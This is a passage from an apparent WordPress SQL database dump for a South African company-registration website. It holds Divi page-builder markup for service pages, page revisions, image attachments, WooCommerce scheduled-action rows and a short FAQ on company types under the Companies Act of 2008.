_i=\"1\" _address=\"1\" min_height=\"565px\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\" _i=\"0\" _address=\"1.0.0\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0.0\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0.0\"]<h2>What Company Type Do I Need ?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\" _i=\"1\" _address=\"1.0.0.0.1\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut l</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.1\"][et_pb_blurb title=\"Private Company\" url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" locked=\"off\" _i=\"0\" _address=\"1.1.0\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI\" url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"600ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" locked=\"off\" _i=\"1\" _address=\"1.1.1\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"2\" _address=\"1.2\"][et_pb_blurb title=\"Personal Liability Company\" url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" locked=\"off\" _i=\"0\" _address=\"1.2.0\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"2.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.27.3\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"2.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"2.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','publish','closed','closed','','company-registrations','','','2019-08-22 15:53:15','2019-08-22 13:53:15','',0,'https://companyregistration.online/?page_id=32664',0,'page','',0),(32665,3,'2019-08-13 10:25:31','2019-08-13 08:25:31','<!-- wp:divi/placeholder /-->','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-13 10:25:31','2019-08-13 08:25:31','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(32666,3,'2019-08-13 10:30:25','2019-08-13 08:30:25','','app-23','','inherit','open','closed','','app-23','','','2019-08-13 10:30:25','2019-08-13 08:30:25','',0,'https://companyregistration.online/wp-content/uploads/2019/08/app-23.png',0,'attachment','image/png',0),(32667,3,'2019-08-13 10:30:27','2019-08-13 08:30:27','','app-developer-illustration-small-03-1','','inherit','open','closed','','app-developer-illustration-small-03-1','','','2019-08-13 10:30:27','2019-08-13 08:30:27','',0,'https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png',0,'attachment','image/png',0),(32668,3,'2019-08-13 10:30:27','2019-08-13 08:30:27','','app-developer-illustration-small-01-1','','inherit','open','closed','','app-developer-illustration-small-01-1','','','2019-08-13 10:30:27','2019-08-13 08:30:27','',0,'https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-01-1.png',0,'attachment','image/png',0),(32669,3,'2019-08-13 10:30:27','2019-08-13 08:30:27','','app-developer-illustration-small-02-1','','inherit','open','closed','','app-developer-illustration-small-02-1','','','2019-08-13 10:30:27','2019-08-13 08:30:27','',0,'https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-02-1.png',0,'attachment','image/png',0),(32709,0,'2019-08-14 06:09:22','2019-08-14 06:09:22','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53a803248af8.85608461-UyYRDifLkhBwQdbRYlv18Aytl0snuK4p','','','2019-08-14 08:19:47','2019-08-14 06:19:47','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32709',0,'scheduled-action','',3),(32710,0,'2019-08-14 06:09:22','2019-08-14 06:09:22','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53a8033ff953.82694512-rbG1uxSBVxNvDQ6JvpulhYuKxs1hoSmb','','','2019-08-14 08:19:47','2019-08-14 06:19:47','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32710',0,'scheduled-action','',3),(32711,0,'2019-08-14 07:19:47','2019-08-14 07:19:47','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53b61724e095.66737094-ZizdBcENw8Mydl91W6XU9BKr6PkrAttG','','','2019-08-14 09:19:51','2019-08-14 07:19:51','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32711',0,'scheduled-action','',3),(32712,0,'2019-08-14 07:19:47','2019-08-14 07:19:47','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53b617315fe4.23249226-6PxrjYuOoLTcJ6LYyk6OLAEvWauDuhmo','','','2019-08-14 09:19:51','2019-08-14 07:19:51','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32712',0,'scheduled-action','',3),(32772,0,'2019-08-15 09:15:41','2019-08-15 09:15:41','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5522d7e81940.93978233-nTme8alLyoY6AbEArMXtNsVDZxNhmZyf','','','2019-08-15 11:16:07','2019-08-15 09:16:07','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32772',0,'scheduled-action','',3),(32773,0,'2019-08-15 09:15:41','2019-08-15 09:15:41','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5522d8076508.52455236-00hyQnzQR1C4kbX00flt9Acm3XCzNQbU','','','2019-08-15 11:16:08','2019-08-15 09:16:08','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32773',0,'scheduled-action','',3),(32774,0,'2019-08-15 10:16:07','2019-08-15 10:16:07','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5530f96e2692.49413166-7G8u4w3UiVlZkg8A7rKpYUYjNkHdKb20','','','2019-08-15 12:16:25','2019-08-15 10:16:25','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32774',0,'scheduled-action','',3),(32775,0,'2019-08-15 10:16:08','2019-08-15 10:16:08','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5530f97d9802.62880759-pMAx4BZbvvYZ7rzC6Edx1jsTxGbAWO14','','','2019-08-15 12:16:25','2019-08-15 10:16:25','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32775',0,'scheduled-action','',3),(32788,0,'2019-08-15 11:16:25','2019-08-15 11:16:25','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d553f12d17991.94289824-fe2NUnhs7osIYS27yngJKCa6ahTA8rbz','','','2019-08-15 13:16:34','2019-08-15 11:16:34','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32788',0,'scheduled-action','',3),(32771,3,'2019-08-15 09:49:53','2019-08-15 07:49:53','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"3.22\"][et_pb_row admin_label=\"row\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Text\" _builder_version=\"3.26.6\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"]<p><strong>What type of companies that can be registered</strong> in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC) </li>\n</ul>\n<p><strong>What is a private company</strong><br />Private companies are comparable to companies of the same status under the Companies Act, 1973 and are characterised by the following:</p>\n<p>They are subject to fewer disclosure and transparency requirements.<br /> A private company will still be prohibited from offering its shares to the public and the transferability of its shares will be restricted, but it may now have more than 50 shareholders.<br /> The name of a private company must end with the expression “Proprietary Limited” or its abbreviation “(Pty) Ltd”.<br /> The board of a private company must comprise at least one director, or any other minimum number as stipulated in its MOI. Each incorporator is a first director of the company.</p>\n<p>&nbsp;</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registration FAQs','','inherit','closed','closed','','357-revision-v1','','','2019-08-15 09:49:53','2019-08-15 07:49:53','',357,'https://companyregistration.online/357-revision-v1/',0,'revision','',0),(32823,3,'2019-08-15 16:08:58','2019-08-15 14:08:58','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Register A Company</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_margin=\"|auto|50px|auto||\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\" custom_margin=\"||104px|||\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>What Company Type Do I Need ?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut l</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Private Company\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Personal Liability Company\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" background_color=\"#ffffff\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" width=\"93%\" module_alignment=\"center\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" header_2_text_align=\"center\" text_font_size=\"21px\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-15 16:08:58','2019-08-15 14:08:58','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(32803,3,'2019-08-15 14:51:24','2019-08-15 12:51:24','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" 